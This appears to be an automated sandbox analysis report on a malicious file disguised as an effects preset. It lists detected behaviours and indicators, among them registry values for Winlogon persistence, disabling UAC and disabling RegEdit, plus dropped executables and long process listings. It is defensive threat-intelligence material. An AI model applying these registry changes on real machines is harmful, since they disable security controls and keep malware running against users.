Analysis Overview
SHA256
50b7daff30ae9ab477edcd35cee332b8a38d61aad5823bfa57cec31d8e226d24
Threat Level: Known bad
The file All Numby_s Impact Presets.sfpreset was found to be: Known bad.
Malicious Activity Summary
UAC bypass
Modifies WinLogon for persistence
Sets file to hidden
Disables RegEdit via registry modification
Loads dropped DLL
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
Drops file in Program Files directory
Enumerates physical storage devices
Browser Information Discovery
System Location Discovery: System Language Discovery
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Views/modifies file attributes
Runs .reg file with regedit
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry key
Modifies data under HKEY_USERS
Uses Volume Shadow Copy WMI provider
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Modifies registry class
Suspicious use of SendNotifyMessage
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-20 18:57
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-20 18:57
Reported
2024-10-20 19:15
Platform
win7-20241010-en
Max time kernel
1016s
Max time network
1049s
Command Line
Signatures
Modifies WinLogon for persistence
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "C:\\Windows\\system32\\userinit.exe,C:\\launch.exe" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\system32\reg.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Windows\system32\reg.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\wallpaper = "C:\\hello.jpg" | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\msg.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\mypc.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\date.txt | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\ | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File opened for modification | C:\Program Files (x86)\ | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\hello.reg | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\launch.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\mover.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\shaking.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\erode.exe | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\hello.bat | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| File created | C:\Program Files (x86)\hello.jpg | C:\Users\Admin\Downloads\No Escape.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\vc_redist.x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\No Escape.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\regedit.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\NoEscape.exe\NoEscape.exe\NoEscape.exe-Latest Version\NoEscape.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\All Numby_s Impact Presets.sfpreset"
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\All Numby_s Impact Presets.sfpreset
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1460 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --mojo-platform-channel-handle=3332 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3428 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3580 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2748 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --mojo-platform-channel-handle=3572 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --mojo-platform-channel-handle=3724 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --mojo-platform-channel-handle=748 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2020 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --mojo-platform-channel-handle=1628 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=2144 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=3704 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --mojo-platform-channel-handle=1956 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=1984 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --mojo-platform-channel-handle=3564 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --mojo-platform-channel-handle=2304 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --mojo-platform-channel-handle=2412 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --mojo-platform-channel-handle=2792 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --mojo-platform-channel-handle=3836 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --mojo-platform-channel-handle=3788 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --mojo-platform-channel-handle=1172 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --mojo-platform-channel-handle=108 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --mojo-platform-channel-handle=3404 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3880 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --mojo-platform-channel-handle=752 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --mojo-platform-channel-handle=736 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --mojo-platform-channel-handle=3952 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --mojo-platform-channel-handle=892 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --mojo-platform-channel-handle=3336 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --mojo-platform-channel-handle=1980 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1064 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --mojo-platform-channel-handle=3436 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --mojo-platform-channel-handle=1620 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --mojo-platform-channel-handle=3384 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --mojo-platform-channel-handle=2612 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --mojo-platform-channel-handle=4148 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --mojo-platform-channel-handle=2344 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --mojo-platform-channel-handle=4264 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --mojo-platform-channel-handle=5408 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5260 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4956 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --mojo-platform-channel-handle=6056 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --mojo-platform-channel-handle=6084 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --mojo-platform-channel-handle=6100 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --mojo-platform-channel-handle=6616 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --mojo-platform-channel-handle=6608 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --mojo-platform-channel-handle=6680 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6724 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6604 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=748 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3364 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:8
C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe
"C:\Users\Admin\Downloads\BonziBuddy - CHIP Installer _bZQvv.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --mojo-platform-channel-handle=6704 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --mojo-platform-channel-handle=4516 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --mojo-platform-channel-handle=3336 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --mojo-platform-channel-handle=4300 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --mojo-platform-channel-handle=6284 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --mojo-platform-channel-handle=5940 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --mojo-platform-channel-handle=6652 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --mojo-platform-channel-handle=6240 --field-trial-handle=1236,i,10261911891358433621,8090082909054005839,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
